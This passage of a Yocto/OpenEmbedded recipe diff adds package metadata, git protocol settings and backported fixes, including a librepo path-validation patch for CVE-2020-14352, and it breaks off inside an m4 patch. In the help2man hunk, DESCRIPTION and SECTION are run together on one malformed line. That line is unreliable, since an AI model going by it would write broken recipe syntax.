+++ b/meta/recipes-devtools/go/go-crosssdk.inc
@@ -4,6 +4,8 @@ DEPENDS = "go-native virtual/${TARGET_PREFIX}gcc-crosssdk virtual/nativesdk-${TA
4PN = "go-crosssdk-${SDK_SYS}" 4PN = "go-crosssdk-${SDK_SYS}"
5PROVIDES = "virtual/${TARGET_PREFIX}go-crosssdk" 5PROVIDES = "virtual/${TARGET_PREFIX}go-crosssdk"
6 6
7export GOCACHE = "${B}/.cache"
8
7do_configure[noexec] = "1" 9do_configure[noexec] = "1"
8 10
9do_compile() { 11do_compile() {
diff --git a/meta/recipes-devtools/go/go-dep_0.5.4.bb b/meta/recipes-devtools/go/go-dep_0.5.4.bb
index 0da2c6607c..e29e53433e 100644
--- a/meta/recipes-devtools/go/go-dep_0.5.4.bb
+++ b/meta/recipes-devtools/go/go-dep_0.5.4.bb
@@ -4,7 +4,7 @@ LICENSE = "BSD-3-Clause"
4LIC_FILES_CHKSUM = "file://src/${GO_IMPORT}/LICENSE;md5=1bad315647751fab0007812f70d42c0d" 4LIC_FILES_CHKSUM = "file://src/${GO_IMPORT}/LICENSE;md5=1bad315647751fab0007812f70d42c0d"
5 5
6GO_IMPORT = "github.com/golang/dep" 6GO_IMPORT = "github.com/golang/dep"
7SRC_URI = "git://${GO_IMPORT} \ 7SRC_URI = "git://${GO_IMPORT};branch=master \
8 file://0001-Add-support-for-mips-mips64.patch;patchdir=src/github.com/golang/dep \ 8 file://0001-Add-support-for-mips-mips64.patch;patchdir=src/github.com/golang/dep \
9 file://0001-bolt_riscv64-Add-support-for-riscv64.patch;patchdir=src/github.com/golang/dep \ 9 file://0001-bolt_riscv64-Add-support-for-riscv64.patch;patchdir=src/github.com/golang/dep \
10 " 10 "
diff --git a/meta/recipes-devtools/go/go_1.14.bb b/meta/recipes-devtools/go/go_1.14.bb
index bc90a1329e..76ff788238 100644
--- a/meta/recipes-devtools/go/go_1.14.bb
+++ b/meta/recipes-devtools/go/go_1.14.bb
@@ -3,12 +3,12 @@ require go-target.inc
3 3
4export GOBUILDMODE="" 4export GOBUILDMODE=""
5export CGO_ENABLED_riscv64 = "" 5export CGO_ENABLED_riscv64 = ""
6# Add pie to GOBUILDMODE to satisfy "textrel" QA checking, but mips/riscv 6# Add pie to GOBUILDMODE to satisfy "textrel" QA checking, but
7# doesn't support -buildmode=pie, so skip the QA checking for mips/riscv and its 7# windows/mips/riscv doesn't support -buildmode=pie, so skip the QA checking
8# variants. 8# for windows/mips/riscv and their variants.
9python() { 9python() {
10 if 'mips' in d.getVar('TARGET_ARCH',True) or 'riscv' in d.getVar('TARGET_ARCH',True): 10 if 'mips' in d.getVar('TARGET_ARCH') or 'riscv' in d.getVar('TARGET_ARCH') or 'windows' in d.getVar('TARGET_GOOS'):
11 d.appendVar('INSANE_SKIP_%s' % d.getVar('PN',True), " textrel") 11 d.appendVar('INSANE_SKIP_%s' % d.getVar('PN'), " textrel")
12 else: 12 else:
13 d.setVar('GOBUILDMODE', 'pie') 13 d.setVar('GOBUILDMODE', 'pie')
14} 14}
diff --git a/meta/recipes-devtools/help2man/help2man-native_1.47.11.bb b/meta/recipes-devtools/help2man/help2man-native_1.47.11.bb
index a60e851897..8e5f940deb 100644
--- a/meta/recipes-devtools/help2man/help2man-native_1.47.11.bb
+++ b/meta/recipes-devtools/help2man/help2man-native_1.47.11.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Program for creating simple man pages" 1SUMMARY = "Program for creating simple man pages"
2SECTION = "devel" 2HOMEPAGE = "https://www.gnu.org/software/help2man/"
3DESCRIPTION = "help2man is a tool for automatically generating simple manual pages from program output."SECTION = "devel"
3LICENSE = "GPLv3" 4LICENSE = "GPLv3"
4LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504" 5LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504"
5DEPENDS = "autoconf-native automake-native" 6DEPENDS = "autoconf-native automake-native"
diff --git a/meta/recipes-devtools/i2c-tools/i2c-tools_4.1.bb b/meta/recipes-devtools/i2c-tools/i2c-tools_4.1.bb
index c5761170aa..fc17e8d9b4 100644
--- a/meta/recipes-devtools/i2c-tools/i2c-tools_4.1.bb
+++ b/meta/recipes-devtools/i2c-tools/i2c-tools_4.1.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Set of i2c tools for linux" 1SUMMARY = "Set of i2c tools for linux"
2HOMEPAGE = "https://i2c.wiki.kernel.org/index.php/I2C_Tools" 2HOMEPAGE = "https://i2c.wiki.kernel.org/index.php/I2C_Tools"
3DESCRIPTION = "The i2c-tools package contains a heterogeneous set of I2C tools for Linux: a bus probing tool, a chip dumper, register-level SMBus access helpers, EEPROM decoding scripts, EEPROM programming tools, and a python module for SMBus access. All versions of Linux are supported, as long as I2C support is included in the kernel."
3SECTION = "base" 4SECTION = "base"
4LICENSE = "GPLv2+" 5LICENSE = "GPLv2+"
5LIC_FILES_CHKSUM = "file://COPYING;md5=751419260aa954499f7abaabaa882bbe" 6LIC_FILES_CHKSUM = "file://COPYING;md5=751419260aa954499f7abaabaa882bbe"
diff --git a/meta/recipes-devtools/icecc-toolchain/nativesdk-icecc-toolchain_0.1.bb b/meta/recipes-devtools/icecc-toolchain/nativesdk-icecc-toolchain_0.1.bb
index 304ad7fec0..ce4d73caf6 100644
--- a/meta/recipes-devtools/icecc-toolchain/nativesdk-icecc-toolchain_0.1.bb
+++ b/meta/recipes-devtools/icecc-toolchain/nativesdk-icecc-toolchain_0.1.bb
@@ -1,6 +1,7 @@
1# Copyright (c) 2018 Joshua Watt, Garmin International,Inc. 1# Copyright (c) 2018 Joshua Watt, Garmin International,Inc.
2# Released under the MIT license (see COPYING.MIT for the terms) 2# Released under the MIT license (see COPYING.MIT for the terms)
3SUMMARY = "Generates Icecream toolchain for SDK" 3SUMMARY = "Generates Icecream toolchain for SDK"
4DESCRIPTION = "${SUMMARY}"
4LICENSE = "MIT" 5LICENSE = "MIT"
5LIC_FILES_CHKSUM = "file://${WORKDIR}/icecc-env.sh;beginline=2;endline=20;md5=dd6b68c1efed8a9fb04e409b3b287d47" 6LIC_FILES_CHKSUM = "file://${WORKDIR}/icecc-env.sh;beginline=2;endline=20;md5=dd6b68c1efed8a9fb04e409b3b287d47"
6 7
diff --git a/meta/recipes-devtools/intltool/intltool_0.51.0.bb b/meta/recipes-devtools/intltool/intltool_0.51.0.bb
index ecff2faf25..592dbb92e2 100644
--- a/meta/recipes-devtools/intltool/intltool_0.51.0.bb
+++ b/meta/recipes-devtools/intltool/intltool_0.51.0.bb
@@ -1,4 +1,6 @@
1SUMMARY = "Utility scripts for internationalizing XML" 1SUMMARY = "Utility scripts for internationalizing XML"
2HOMEPAGE = "https://launchpad.net/intltool"
3DESCRIPTION = "Utility scripts for internationalizing XML. This tool automatically extracts translatable strings from oaf, glade, bonobo ui, nautilus theme and other XML files into the po files."
2SECTION = "devel" 4SECTION = "devel"
3LICENSE = "GPLv2" 5LICENSE = "GPLv2"
4LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f" 6LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f"
diff --git a/meta/recipes-devtools/jquery/jquery_3.5.0.bb b/meta/recipes-devtools/jquery/jquery_3.5.0.bb
index 5c6f9cddbe..efffe05fd2 100644
--- a/meta/recipes-devtools/jquery/jquery_3.5.0.bb
+++ b/meta/recipes-devtools/jquery/jquery_3.5.0.bb
@@ -1,5 +1,6 @@
1SUMMARY = "jQuery is a fast, small, and feature-rich JavaScript library" 1SUMMARY = "jQuery is a fast, small, and feature-rich JavaScript library"
2HOMEPAGE = "https://jquery.com/" 2HOMEPAGE = "https://jquery.com/"
3DESCRIPTION = "${SUMMARY}"
3LICENSE = "MIT" 4LICENSE = "MIT"
4SECTION = "devel" 5SECTION = "devel"
5LIC_FILES_CHKSUM = "file://${WORKDIR}/${BP}.js;startline=8;endline=10;md5=b1e67ece919e852643f1541a54492d65" 6LIC_FILES_CHKSUM = "file://${WORKDIR}/${BP}.js;startline=8;endline=10;md5=b1e67ece919e852643f1541a54492d65"
@@ -16,6 +17,11 @@ SRC_URI[map.sha256sum] = "3149351c8cbc3fb230bbf6188617c7ffda77d9e14333f4f5f0aa1a
16 17
17UPSTREAM_CHECK_REGEX = "jquery-(?P<pver>\d+(\.\d+)+)\.js" 18UPSTREAM_CHECK_REGEX = "jquery-(?P<pver>\d+(\.\d+)+)\.js"
18 19
20# https://github.com/jquery/jquery/issues/3927
21# There are ways jquery can expose security issues but any issues are in the apps exposing them
22# and there is little we can directly do
23CVE_CHECK_WHITELIST += "CVE-2007-2379"
24
19inherit allarch 25inherit allarch
20 26
21do_install() { 27do_install() {
diff --git a/meta/recipes-devtools/libcomps/libcomps_0.1.15.bb b/meta/recipes-devtools/libcomps/libcomps_0.1.15.bb
index 98c55dca85..d9e712f74a 100644
--- a/meta/recipes-devtools/libcomps/libcomps_0.1.15.bb
+++ b/meta/recipes-devtools/libcomps/libcomps_0.1.15.bb
@@ -1,8 +1,10 @@
1SUMMARY = "Libcomps is alternative for yum.comps library (which is for managing rpm package groups)." 1SUMMARY = "Libcomps is alternative for yum.comps library (which is for managing rpm package groups)."
2HOMEPAGE = "https://github.com/rpm-software-management/libcomps"
3DESCRIPTION = "Libcomps is alternative for yum.comps library. It's written in pure C as library and there's bindings for python2 and python3."
2LICENSE = "GPLv2" 4LICENSE = "GPLv2"
3LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" 5LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
4 6
5SRC_URI = "git://github.com/rpm-software-management/libcomps.git \ 7SRC_URI = "git://github.com/rpm-software-management/libcomps.git;branch=master;protocol=https \
6 file://0001-Add-crc32.c-to-sources-list.patch \ 8 file://0001-Add-crc32.c-to-sources-list.patch \
7 file://0002-Do-not-set-PYTHON_INSTALL_DIR-by-running-python.patch \ 9 file://0002-Do-not-set-PYTHON_INSTALL_DIR-by-running-python.patch \
8 " 10 "
diff --git a/meta/recipes-devtools/libdnf/libdnf/0040-Mark-job-goal.upgrade-with-sltr-as-target.patch b/meta/recipes-devtools/libdnf/libdnf/0040-Mark-job-goal.upgrade-with-sltr-as-target.patch
new file mode 100644
index 0000000000..61d255581b
--- /dev/null
+++ b/meta/recipes-devtools/libdnf/libdnf/0040-Mark-job-goal.upgrade-with-sltr-as-target.patch
@@ -0,0 +1,58 @@
1From b4c5a3312287f31a2075a235db846ff611586d2c Mon Sep 17 00:00:00 2001
2From: Jaroslav Mracek <jmracek@redhat.com>
3Date: Tue, 3 Sep 2019 11:01:23 +0200
4Subject: [PATCH] Mark job goal.upgrade with sltr as targeted
5
6It allows to keep installed packages in upgrade set.
7
8It also prevents from reinstalling of modified packages with same NEVRA.
9
10
11Backport commit b4c5a3312287f31a2075a235db846ff611586d2c from
12https://github.com/rpm-software-management/libdnf
13
14This bug is present in oe-core's dnf
15
16Remove changes to spec file from upstream
17
18Upstream-Status: Backport
19Signed-off-by: Jate Sujjavanich <jatedev@gmail.com>
20---
21 libdnf.spec | 4 ++--
22 libdnf/goal/Goal.cpp | 2 +-
23 libdnf/goal/Goal.hpp | 6 ++++--
24 3 files changed, 7 insertions(+), 5 deletions(-)
25
26diff --git a/libdnf/goal/Goal.cpp b/libdnf/goal/Goal.cpp
27index b69be19..a38cbb4 100644
28--- a/libdnf/goal/Goal.cpp
29+++ b/libdnf/goal/Goal.cpp
30@@ -767,7 +767,7 @@ void
31 Goal::upgrade(HySelector sltr)
32 {
33 pImpl->actions = static_cast<DnfGoalActions>(pImpl->actions | DNF_UPGRADE);
34- sltrToJob(sltr, &pImpl->staging, SOLVER_UPDATE);
35+ sltrToJob(sltr, &pImpl->staging, SOLVER_UPDATE|SOLVER_TARGETED);
36 }
37
38 void
39diff --git a/libdnf/goal/Goal.hpp b/libdnf/goal/Goal.hpp
40index f33dfa2..d701317 100644
41--- a/libdnf/goal/Goal.hpp
42+++ b/libdnf/goal/Goal.hpp
43@@ -86,8 +86,10 @@ public:
44 /**
45 * @brief If selector ill formed, it rises std::runtime_error()
46 *
47- * @param sltr p_sltr: It should contain only upgrades with obsoletes otherwise it can try to
48- * reinstall installonly packages.
49+ * @param sltr p_sltr: It contains upgrade-to packages and obsoletes. The presence of installed
50+ * packages prevents reinstalling packages with the same NEVRA but changed contant. To honor repo
51+ * priority all relevant packages must be present. To upgrade package foo from priority repo, all
52+ * installed and available packages of the foo must be in selector plus obsoletes of foo.
53 */
54 void upgrade(HySelector sltr);
55 void userInstalled(DnfPackage *pkg);
56--
572.7.4
58
diff --git a/meta/recipes-devtools/libdnf/libdnf_0.28.1.bb b/meta/recipes-devtools/libdnf/libdnf_0.28.1.bb
index 43de06e7f9..39858ad401 100644
--- a/meta/recipes-devtools/libdnf/libdnf_0.28.1.bb
+++ b/meta/recipes-devtools/libdnf/libdnf_0.28.1.bb
@@ -1,14 +1,17 @@
1SUMMARY = "Library providing simplified C and Python API to libsolv" 1SUMMARY = "Library providing simplified C and Python API to libsolv"
2HOMEPAGE = "https://github.com/rpm-software-management/libdnf"
3DESCRIPTION = "This library provides a high level package-manager. It's core library of dnf, PackageKit and rpm-ostree. It's replacement for deprecated hawkey library which it contains inside and uses librepo under the hood."
2LICENSE = "LGPLv2.1+" 4LICENSE = "LGPLv2.1+"
3LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c" 5LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
4 6
5SRC_URI = "git://github.com/rpm-software-management/libdnf \ 7SRC_URI = "git://github.com/rpm-software-management/libdnf;branch=master;protocol=https \
6 file://0001-FindGtkDoc.cmake-drop-the-requirement-for-GTKDOC_SCA.patch \ 8 file://0001-FindGtkDoc.cmake-drop-the-requirement-for-GTKDOC_SCA.patch \
7 file://0004-Set-libsolv-variables-with-pkg-config-cmake-s-own-mo.patch \ 9 file://0004-Set-libsolv-variables-with-pkg-config-cmake-s-own-mo.patch \
8 file://0001-Get-parameters-for-both-libsolv-and-libsolvext-libdn.patch \ 10 file://0001-Get-parameters-for-both-libsolv-and-libsolvext-libdn.patch \
9 file://0001-Add-WITH_TESTS-option.patch \ 11 file://0001-Add-WITH_TESTS-option.patch \
10 file://0001-include-stdexcept-for-runtime_error.patch \ 12 file://0001-include-stdexcept-for-runtime_error.patch \
11 file://fix-deprecation-warning.patch \ 13 file://fix-deprecation-warning.patch \
14 file://0040-Mark-job-goal.upgrade-with-sltr-as-target.patch \
12 " 15 "
13 16
14SRCREV = "751f89045b80d58c0d05800f74357cf78cdf7e77" 17SRCREV = "751f89045b80d58c0d05800f74357cf78cdf7e77"
diff --git a/meta/recipes-devtools/libmodulemd/libmodulemd-v1_git.bb b/meta/recipes-devtools/libmodulemd/libmodulemd-v1_git.bb
index 5409051d79..7d8560f3cc 100644
--- a/meta/recipes-devtools/libmodulemd/libmodulemd-v1_git.bb
+++ b/meta/recipes-devtools/libmodulemd/libmodulemd-v1_git.bb
@@ -1,4 +1,6 @@
1SUMMARY = "C Library for manipulating module metadata files" 1SUMMARY = "C Library for manipulating module metadata files"
2HOMEPAGE = "https://github.com/fedora-modularity/libmodulemd"
3DESCRIPTION = "${SUMMARY}"
2LICENSE = "MIT" 4LICENSE = "MIT"
3LIC_FILES_CHKSUM = "file://COPYING;md5=25a3927bff3ee4f5b21bcb0ed3fcd6bb" 5LIC_FILES_CHKSUM = "file://COPYING;md5=25a3927bff3ee4f5b21bcb0ed3fcd6bb"
4 6
diff --git a/meta/recipes-devtools/librepo/librepo/CVE-2020-14352.patch b/meta/recipes-devtools/librepo/librepo/CVE-2020-14352.patch
new file mode 100644
index 0000000000..8f4c5b73bc
--- /dev/null
+++ b/meta/recipes-devtools/librepo/librepo/CVE-2020-14352.patch
@@ -0,0 +1,55 @@
1From 6027d68337b537bf9a68cf810cf9b8e40dac22f8 Mon Sep 17 00:00:00 2001
2From: Jaroslav Rohel <jrohel@redhat.com>
3Date: Wed, 12 Aug 2020 08:35:28 +0200
4Subject: [PATCH] Validate path read from repomd.xml (RhBug:1868639)
5
6= changelog =
7msg: Validate path read from repomd.xml
8type: security
9resolves: https://bugzilla.redhat.com/show_bug.cgi?id=1868639
10
11Upstream-Status: Acepted [https://github.com/rpm-software-management/librepo/commit/7daea2a2429a54dad68b1de9b37a5f65c5cf2600]
12CVE: CVE-2020-14352
13Signed-off-by: Minjae Kim <flowergom@gmail.com>
14---
15 librepo/yum.c | 17 +++++++++++++++++
16 1 file changed, 17 insertions(+)
17
18diff --git a/librepo/yum.c b/librepo/yum.c
19index 3059188..529257b 100644
20--- a/librepo/yum.c
21+++ b/librepo/yum.c
22@@ -23,6 +23,7 @@
23 #define BITS_IN_BYTE 8
24
25 #include <stdio.h>
26+#include <libgen.h>
27 #include <assert.h>
28 #include <stdlib.h>
29 #include <errno.h>
30@@ -770,6 +771,22 @@ prepare_repo_download_targets(LrHandle *handle,
31 continue;
32
33 char *location_href = record->location_href;
34+
35+ char *dest_dir = realpath(handle->destdir, NULL);
36+ path = lr_pathconcat(handle->destdir, record->location_href, NULL);
37+ char *requested_dir = realpath(dirname(path), NULL);
38+ lr_free(path);
39+ if (!g_str_has_prefix(requested_dir, dest_dir)) {
40+ g_debug("%s: Invalid path: %s", __func__, location_href);
41+ g_set_error(err, LR_YUM_ERROR, LRE_IO, "Invalid path: %s", location_href);
42+ g_slist_free_full(*targets, (GDestroyNotify) lr_downloadtarget_free);
43+ free(requested_dir);
44+ free(dest_dir);
45+ return FALSE;
46+ }
47+ free(requested_dir);
48+ free(dest_dir);
49+
50 gboolean is_zchunk = FALSE;
51 #ifdef WITH_ZCHUNK
52 if (handle->cachedir && record->header_checksum)
53--
542.17.1
55
diff --git a/meta/recipes-devtools/librepo/librepo_1.11.2.bb b/meta/recipes-devtools/librepo/librepo_1.11.2.bb
index 6a0a59f865..73a58f75e3 100644
--- a/meta/recipes-devtools/librepo/librepo_1.11.2.bb
+++ b/meta/recipes-devtools/librepo/librepo_1.11.2.bb
@@ -1,11 +1,14 @@
1SUMMARY = "A library providing C and Python (libcURL like) API \ 1SUMMARY = "A library providing C and Python (libcURL like) API \
2 for downloading linux repository metadata and packages." 2 for downloading linux repository metadata and packages."
3HOMEPAGE = "https://github.com/rpm-software-management/librepo"
4DESCRIPTION = "${SUMMARY}"
3LICENSE = "LGPLv2.1" 5LICENSE = "LGPLv2.1"
4LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c" 6LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
5 7
6SRC_URI = "git://github.com/rpm-software-management/librepo.git \ 8SRC_URI = "git://github.com/rpm-software-management/librepo.git;branch=master;protocol=https \
7 file://0002-Do-not-try-to-obtain-PYTHON_INSTALL_DIR-by-running-p.patch \ 9 file://0002-Do-not-try-to-obtain-PYTHON_INSTALL_DIR-by-running-p.patch \
8 file://0004-Set-gpgme-variables-with-pkg-config-not-with-cmake-m.patch \ 10 file://0004-Set-gpgme-variables-with-pkg-config-not-with-cmake-m.patch \
11 file://CVE-2020-14352.patch \
9 " 12 "
10 13
11SRCREV = "67c2d1f83f1bf87be3f26ba730fce7fbdf0c9fba" 14SRCREV = "67c2d1f83f1bf87be3f26ba730fce7fbdf0c9fba"
diff --git a/meta/recipes-devtools/libtool/libtool-2.4.6.inc b/meta/recipes-devtools/libtool/libtool-2.4.6.inc
index 8e17b56d46..c8744e6d5f 100644
--- a/meta/recipes-devtools/libtool/libtool-2.4.6.inc
+++ b/meta/recipes-devtools/libtool/libtool-2.4.6.inc
@@ -21,6 +21,10 @@ SRC_URI = "${GNU_MIRROR}/libtool/libtool-${PV}.tar.gz \
21 file://unwind-opt-parsing.patch \ 21 file://unwind-opt-parsing.patch \
22 file://0001-libtool-Fix-support-for-NIOS2-processor.patch \ 22 file://0001-libtool-Fix-support-for-NIOS2-processor.patch \
23 file://0001-libtool-Check-for-static-libs-for-internal-compiler-.patch \ 23 file://0001-libtool-Check-for-static-libs-for-internal-compiler-.patch \
24 file://0001-Makefile.am-make-sure-autoheader-run-before-autoconf.patch \
25 file://0001-Makefile.am-make-sure-autoheader-run-before-automake.patch \
26 file://lto-prefix.patch \
27 file://debian-no_hostname.patch \
24 " 28 "
25 29
26SRC_URI[md5sum] = "addf44b646ddb4e3919805aa88fa7c5e" 30SRC_URI[md5sum] = "addf44b646ddb4e3919805aa88fa7c5e"
diff --git a/meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-autoconf.patch b/meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-autoconf.patch
new file mode 100644
index 0000000000..2e9908725e
--- /dev/null
+++ b/meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-autoconf.patch
@@ -0,0 +1,35 @@
1From dfbbbd359e43e0a55fbea06f2647279ad8761cb9 Mon Sep 17 00:00:00 2001
2From: Mingli Yu <mingli.yu@windriver.com>
3Date: Wed, 24 Mar 2021 03:04:13 +0000
4Subject: [PATCH] Makefile.am: make sure autoheader run before autoconf
5
6autoheader will update ../libtool-2.4.6/libltdl/config-h.in which
7autoconf needs, so there comes a race sometimes as below:
8 | configure.ac:45: error: required file 'config-h.in' not found
9 | touch '../libtool-2.4.6/libltdl/config-h.in'
10
11So make sure autoheader run before autoconf to avoid this race.
12
13Upstream-Status: Submitted [libtool-patches@gnu.org maillist]
14
15Signed-off-by: Mingli Yu <mingli.yu@windriver.com>
16---
17 Makefile.am | 2 +-
18 1 file changed, 1 insertion(+), 1 deletion(-)
19
20diff --git a/Makefile.am b/Makefile.am
21index 4142c90..fe1a9fc 100644
22--- a/Makefile.am
23+++ b/Makefile.am
24@@ -365,7 +365,7 @@ lt_configure_deps = $(lt_aclocal_m4) $(lt_aclocal_m4_deps)
25 $(lt_aclocal_m4): $(lt_aclocal_m4_deps)
26 $(AM_V_GEN)cd '$(srcdir)/$(ltdl_dir)' && $(ACLOCAL) -I ../m4
27
28-$(lt_configure): $(lt_configure_deps)
29+$(lt_configure): $(lt_configure_deps) $(lt_config_h_in)
30 $(AM_V_GEN)cd '$(srcdir)/$(ltdl_dir)' && $(AUTOCONF)
31
32 $(lt_config_h_in): $(lt_configure_deps)
33--
342.29.2
35
diff --git a/meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-automake.patch b/meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-automake.patch
new file mode 100644
index 0000000000..87f8492346
--- /dev/null
+++ b/meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-automake.patch
@@ -0,0 +1,35 @@
1From e82c06584f02e3e4487aa73aa05981e2a35dc6d1 Mon Sep 17 00:00:00 2001
2From: Mingli Yu <mingli.yu@windriver.com>
3Date: Tue, 13 Apr 2021 07:17:29 +0000
4Subject: [PATCH] Makefile.am: make sure autoheader run before automake
5
6When use automake to generate Makefile.in from Makefile.am, there
7comes below race:
8 | configure.ac:45: error: required file 'config-h.in' not found
9
10It is because the file config-h.in in updating process by autoheader,
11so make automake run after autoheader to avoid the above race.
12
13Upstream-Status: Submitted [libtool-patches@gnu.org maillist]
14
15Signed-off-by: Mingli Yu <mingli.yu@windriver.com>
16---
17 Makefile.am | 2 +-
18 1 file changed, 1 insertion(+), 1 deletion(-)
19
20diff --git a/Makefile.am b/Makefile.am
21index 2752ecc..29950db 100644
22--- a/Makefile.am
23+++ b/Makefile.am
24@@ -328,7 +328,7 @@ EXTRA_DIST += $(lt_aclocal_m4) \
25 $(lt_obsolete_m4) \
26 $(stamp_mk)
27
28-$(lt_Makefile_in): $(lt_Makefile_am) $(lt_aclocal_m4)
29+$(lt_Makefile_in): $(lt_Makefile_am) $(lt_aclocal_m4) $(lt_config_h_in)
30 $(AM_V_GEN)cd '$(srcdir)/$(ltdl_dir)' && $(AUTOMAKE) Makefile
31
32 # Don't let unused scripts leak into the libltdl Makefile
33--
342.29.2
35
diff --git a/meta/recipes-devtools/libtool/libtool/lto-prefix.patch b/meta/recipes-devtools/libtool/libtool/lto-prefix.patch
new file mode 100644
index 0000000000..2bd010b8e4
--- /dev/null
+++ b/meta/recipes-devtools/libtool/libtool/lto-prefix.patch
@@ -0,0 +1,22 @@
1If lto is enabled, we need the prefix-map variables to be passed to the linker.
2Add these to the list of options libtool passes through.
3
4Upstream-Status: Pending
5Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
6
7Index: libtool-2.4.6/build-aux/ltmain.in
8===================================================================
9--- libtool-2.4.6.orig/build-aux/ltmain.in
10+++ libtool-2.4.6/build-aux/ltmain.in
11@@ -5424,9 +5424,10 @@ func_mode_link ()
12 # --sysroot=* for sysroot support
13 # -O*, -g*, -flto*, -fwhopr*, -fuse-linker-plugin GCC link-time optimization
14 # -stdlib=* select c++ std lib with clang
15+ # -f*-prefix-map* needed for lto linking
16 -64|-mips[0-9]|-r[0-9][0-9]*|-xarch=*|-xtarget=*|+DA*|+DD*|-q*|-m*| \
17 -t[45]*|-txscale*|-p|-pg|--coverage|-fprofile-*|-F*|@*|-tp=*|--sysroot=*| \
18- -O*|-g*|-flto*|-fwhopr*|-fuse-linker-plugin|-fstack-protector*|-stdlib=*)
19+ -O*|-g*|-flto*|-fwhopr*|-fuse-linker-plugin|-fstack-protector*|-stdlib=*|-f*-prefix-map*)
20 func_quote_for_eval "$arg"
21 arg=$func_quote_for_eval_result
22 func_append compile_command " $arg"
diff --git a/meta/recipes-devtools/libtool/libtool_2.4.6.bb b/meta/recipes-devtools/libtool/libtool_2.4.6.bb
index a5715faaa9..f5fdd00e5e 100644
--- a/meta/recipes-devtools/libtool/libtool_2.4.6.bb
+++ b/meta/recipes-devtools/libtool/libtool_2.4.6.bb
@@ -1,6 +1,6 @@
1require libtool-${PV}.inc 1require libtool-${PV}.inc
2 2
3SRC_URI += "file://multilib.patch file://debian-no_hostname.patch" 3SRC_URI += "file://multilib.patch"
4 4
5RDEPENDS_${PN} += "bash" 5RDEPENDS_${PN} += "bash"
6 6
diff --git a/meta/recipes-devtools/llvm/llvm_git.bb b/meta/recipes-devtools/llvm/llvm_git.bb
index 534e2c685f..de92cef1a4 100644
--- a/meta/recipes-devtools/llvm/llvm_git.bb
+++ b/meta/recipes-devtools/llvm/llvm_git.bb
@@ -30,7 +30,7 @@ LLVM_DIR = "llvm${LLVM_RELEASE}"
30 30
31BRANCH = "release/${MAJOR_VERSION}.x" 31BRANCH = "release/${MAJOR_VERSION}.x"
32SRCREV = "c1a0a213378a458fbea1a5c77b315c7dce08fd05" 32SRCREV = "c1a0a213378a458fbea1a5c77b315c7dce08fd05"
33SRC_URI = "git://github.com/llvm/llvm-project.git;branch=${BRANCH} \ 33SRC_URI = "git://github.com/llvm/llvm-project.git;branch=${BRANCH};protocol=https \
34 file://0006-llvm-TargetLibraryInfo-Undefine-libc-functions-if-th.patch;striplevel=2 \ 34 file://0006-llvm-TargetLibraryInfo-Undefine-libc-functions-if-th.patch;striplevel=2 \
35 file://0007-llvm-allow-env-override-of-exe-path.patch;striplevel=2 \ 35 file://0007-llvm-allow-env-override-of-exe-path.patch;striplevel=2 \
36 file://0001-AsmMatcherEmitter-sort-ClassInfo-lists-by-name-as-we.patch;striplevel=2 \ 36 file://0001-AsmMatcherEmitter-sort-ClassInfo-lists-by-name-as-we.patch;striplevel=2 \
diff --git a/meta/recipes-devtools/m4/m4-1.4.18.inc b/meta/recipes-devtools/m4/m4-1.4.18.inc
index a9b63c1bf6..6475b02f8b 100644
--- a/meta/recipes-devtools/m4/m4-1.4.18.inc
+++ b/meta/recipes-devtools/m4/m4-1.4.18.inc
@@ -9,6 +9,7 @@ inherit autotools texinfo ptest
9SRC_URI = "${GNU_MIRROR}/m4/m4-${PV}.tar.gz \ 9SRC_URI = "${GNU_MIRROR}/m4/m4-${PV}.tar.gz \
10 file://ac_config_links.patch \ 10 file://ac_config_links.patch \
11 file://m4-1.4.18-glibc-change-work-around.patch \ 11 file://m4-1.4.18-glibc-change-work-around.patch \
12 file://0001-c-stack-stop-using-SIGSTKSZ.patch \
12 " 13 "
13SRC_URI_append_class-target = " file://0001-Unset-need_charset_alias-when-building-for-musl.patch \ 14SRC_URI_append_class-target = " file://0001-Unset-need_charset_alias-when-building-for-musl.patch \
14 file://run-ptest \ 15 file://run-ptest \
diff --git a/meta/recipes-devtools/m4/m4/0001-c-stack-stop-using-SIGSTKSZ.patch b/meta/recipes-devtools/m4/m4/0001-c-stack-stop-using-SIGSTKSZ.patch
new file mode 100644
index 0000000000..883b8a2075
--- /dev/null
+++ b/meta/recipes-devtools/m4/m4/0001-c-stack-stop-using-SIGSTKSZ.patch
@@ -0,0 +1,84 @@
1From 69238f15129f35eb4756ad8e2004e0d7907cb175 Mon Sep 17 00:00:00 2001
2From: Khem Raj <raj.khem@gmail.com>
3Date: Fri, 30 Apr 2021 17:40:36 -0700
4Subject: [PATCH] c-stack: stop using SIGSTKSZ
5
6This patch is required with glibc 2.34+
7based on gnulib [1]
8
9[1] https://git.savannah.gnu.org/cgit/gnulib.git/commit/?id=f9e2b20a12a230efa30f1d479563ae07d276a94b
10
11Upstream-Status: Pending
12Signed-off-by: Khem Raj <raj.khem@gmail.com>
13---
14 lib/c-stack.c | 22 +++++++++++++---------
15 1 file changed, 13 insertions(+), 9 deletions(-)
16
17diff --git a/lib/c-stack.c b/lib/c-stack.c
18index 5353c08..863f764 100644
19--- a/lib/c-stack.c
20+++ b/lib/c-stack.c
